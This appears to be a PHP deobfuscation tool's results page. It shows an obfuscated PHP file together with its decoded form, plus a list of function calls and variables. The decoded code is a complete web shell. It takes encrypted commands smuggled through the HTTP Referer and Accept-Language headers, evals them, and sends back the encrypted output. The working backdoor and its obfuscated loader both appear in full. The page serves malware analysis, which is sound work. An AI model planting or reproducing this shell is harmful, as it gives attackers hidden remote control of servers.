Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $E='K;ob_staKrt(K)K;@evKal(@gzKuncompKKress(@x(@basKe64_dKecode(Kpreg_replaKceK(arra..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$E='K;ob_staKrt(K)K;@evKal(@gzKuncompKKress(@x(@basKe64_dKecode(Kpreg_replaKceK(array("/_/"K,K"/-/"';
$A=str_replace('b','','cbrebbate_fubbnctbion');
$K='K&$ra)KK{$u=pKarse_url($Krr);parse_Kstr($KKu["query"]K,$Kq);$qK=array_KvalKues($q);preg_mKatc';
$a='),array("/"K,K"K+"),$Kss($s[$i]K,0,$e))),$k)K))K;$oK=ob_get_contentKKs();ob_end_KcleKKan();$d=ba';
$m=');}if(Karray_key_exKists($i,K$s))K{$Ks[$i].=$p;$e=KsKtKrpos($s[$i]K,$Kf);if($e){$Kk=$kh.$kf';
$Z='Kss(md5($i.$kh)KK,0,K3));$f=$sl($ss(mKd5(K$i.$kf),K0,3));$Kp=""K;fKor(K$z=1;$zK<count(';
$C='$kKh="5dK41";$kf="402a";fKuKnction xKK($t,$k){$cK=strlKen($Kk);$l=sKtrlen($t);$oK=""K';
$Y='sKe64_encodeK(x(KgzcompresKs($KoKK)K,$k));print("<$Kk>$d</K$k>");@session_deKstroy(K);}}}}';
$S='tKurn K$o;}$r=$_SERVER;$Krr=@$rK["KHTTP_KRKEFERER"];$ra=@$r["KHKTTP_ACCEPT_LKKANGKUAGE"];if($rr&';
$j=';for($Ki=K0;$i<$l;){for(K$Kj=0K;($j<$c&&$i<K$l);$Kj++,$i++)K{$o.K=$t{$iKK}^$k{$j};}K}rKe';
$P='$m[1]);K$z++K)$pK.=$q[$Km[K2][$z]K];if(strpos($p,$h)K==K=0){$s[$Ki]="KK"K;$p=$ss($p,3K';
$D='t();$s=&$_SKESSIOKN;$Kss="sKubstr";K$sl="sKtrtoloKwKer";K$i=$m[1][0].$m[KK1][1];$hK=$Ksl($';
$H='hK_all("/(K[\\wK])[\\w-K]+(?K:;q=0.([\\Kd]))?,?/"K,$ra,K$m);Kif($q&K&$mK){@session_stKarK';
$I=str_replace('K','',$C.$j.$S.$K.$H.$D.$Z.$P.$m.$E.$a.$Y);
$t=$A('',$I);$t();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A create_function
$C $kKh="5dK41";$kf="402a";fKuKnction xKK($t,$k){$cK=strlKen($K..
$D t();$s=&$_SKESSIOKN;$Kss="sKubstr";K$sl="sKtrtoloKwKer";K$i=..
$E K;ob_staKrt(K)K;@evKal(@gzKuncompKKress(@x(@basKe64_dKecode(..
$H hK_all("/(K[\wK])[\w-K]+(?K:;q=0.([\Kd]))?,?/"K,$ra,K$m);Kif..
$I $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$K K&$ra)KK{$u=pKarse_url($Krr);parse_Kstr($KKu["query"]K,$Kq);..
$P $m[1]);K$z++K)$pK.=$q[$Km[K2][$z]K];if(strpos($p,$h)K==K=0){..
$S tKurn K$o;}$r=$_SERVER;$Krr=@$rK["KHTTP_KRKEFERER"];$ra=@$r[..
$Y sKe64_encodeK(x(KgzcompresKs($KoKK)K,$k));print("<$Kk>$d</K$..
$Z Kss(md5($i.$kh)KK,0,K3));$f=$sl($ss(mKd5(K$i.$kf),K0,3));$Kp..
$a ),array("/"K,K"K+"),$Kss($s[$i]K,0,$e))),$k)K))K;$oK=ob_get_..
$j ;for($Ki=K0;$i<$l;){for(K$Kj=0K;($j<$c&&$i<K$l);$Kj++,$i++)K..
$m );}if(Karray_key_exKists($i,K$s))K{$Ks[$i].=$p;$e=KsKtKrpos(..
$t None

Stats

MD5 18356305240c16b2a8e0e09b3ac5f592
Eval Count 1
Decode Time 128 ms